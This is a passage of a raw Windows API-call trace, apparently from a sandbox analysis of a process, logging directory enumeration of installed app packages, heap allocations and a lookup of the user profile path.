ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7544fabf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy", cAlternateFileName="MICROS~1.MOD")) returned 1 [0177.007] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b8500e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b8500e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy", cAlternateFileName="MICROS~2.OOB")) returned 1 [0177.007] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74116aed, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74116aed, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy", cAlternateFileName="MICROS~1.OOB")) returned 1 [0177.007] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82539239, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x734de9c3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x73a62109, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.ParentalControls_cw5n1h2txyewy", cAlternateFileName="MICROS~1.PAR")) returned 1 [0177.007] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fcdfb62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xec8930d8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xecaaa968, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.Photos_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.PHO")) returned 1 [0177.007] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x726dcc78, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x726dcc78, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.SecHealthUI_cw5n1h2txyewy", cAlternateFileName="MICROS~3.SEC")) returned 1 [0177.007] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8333af6e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x70e206ba, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x70e206ba, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", cAlternateFileName="MICROS~1.SEC")) returned 1 [0177.007] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7025ab41, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702a7000, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x702a7000, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy", cAlternateFileName="MICROS~2.SEC")) returned 1 [0177.007] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a66aba6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd6e44f49, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd6e44f49, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", cAlternateFileName="MICROS~1.SHE")) returned 1 [0177.007] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71ce0e7e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.Windows.WindowPicker_cw5n1h2txyewy", cAlternateFileName="MI948A~1.WIN")) returned 1 [0177.007] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x8681db72, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x8769207c, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.WindowsAlarms_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.WIN")) returned 1 [0177.007] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4d85f5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc2086555, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xc2086555, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.WindowsCalculator_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.WIN")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xef547375, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef81c039, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.WindowsCamera_8wekyb3d8bbwe", cAlternateFileName="MICROS~3.WIN")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf1aae2a1, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf1aae2a1, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", cAlternateFileName="MICROS~4.WIN")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed548e8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbede9823, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xbede9823, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", cAlternateFileName="MIDE9E~1.WIN")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xbd8024eb, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xbd8024eb, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.WindowsMaps_8wekyb3d8bbwe", cAlternateFileName="MID92F~1.WIN")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xb907b89d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xb907b89d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.WindowsPhone_8wekyb3d8bbwe", cAlternateFileName="MI7D5A~1.WIN")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6670683, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x9690fc23, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x96d8829d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", cAlternateFileName="MIA6CE~1.WIN")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4097064, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xef652437, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef8b4999, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.WindowsStore_8wekyb3d8bbwe", cAlternateFileName="MI052B~1.WIN")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x94eafafc, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x950534fc, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.XboxApp_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.XBO")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91227223, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x6f3e6702, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x6f58a0ab, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", cAlternateFileName="MICROS~2.XBO")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b10a7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x936165c3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x936165c3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.XboxGameOverlay_8wekyb3d8bbwe", cAlternateFileName="MIF834~1.XBO")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf20f05a0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf22e0430, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf22e0430, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.XboxIdentityProvider_8wekyb3d8bbwe", cAlternateFileName="MICROS~4.XBO")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x924fb15e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe", cAlternateFileName="MICROS~3.XBO")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabdcd6c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x9120e63a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x913b2022, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.ZuneMusic_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.ZUN")) returned 1 [0177.008] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf679d775, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x8efa262b, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x8f25108d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Microsoft.ZuneVideo_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.ZUN")) returned 1 [0177.040] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x788510a7, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x789ce851, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Windows.ContactSupport_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.CON")) returned 1 [0177.040] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddb3df96, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a8cfa4e, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3a8cfa4e, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="windows.devicesflow_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.DEV")) returned 1 [0177.040] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b315bfa, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd8832b29, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd8832b29, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="windows.immersivecontrolpanel_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.IMM")) returned 1 [0177.040] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c13db32, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x77c3f1ef, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x77c3f1ef, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Windows.MiracastView_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.MIR")) returned 1 [0177.040] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9cdd849c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x715dffc9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x715dffc9, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Windows.PrintDialog_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.PRI")) returned 1 [0177.041] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3af37fe8, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3af37fe8, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="windows_ie_ac_001", cAlternateFileName="WINDOW~1")) returned 1 [0177.041] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3af37fe8, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3af37fe8, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="windows_ie_ac_001", cAlternateFileName="WINDOW~1")) returned 0 [0177.041] FindClose (in: hFindFile=0x9e2238 | out: hFindFile=0x9e2238) returned 1 [0177.041] GetLastError () returned 0x12 [0177.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0177.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0177.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0177.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0177.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0177.041] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0177.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0177.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0177.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0177.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0177.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0177.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0177.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0177.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0177.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0177.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0177.042] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0177.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0177.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0177.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0177.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0177.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0177.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa540 [0177.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0177.042] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0177.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0177.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0177.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0177.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0177.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0177.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0177.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0177.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0177.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0177.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0177.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0177.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0177.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0177.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0177.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0177.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0177.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0177.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0177.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0177.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0177.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0177.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0177.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0177.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0177.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0177.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0177.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0177.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0177.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0177.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0177.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0177.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0177.043] HeapFree (in: 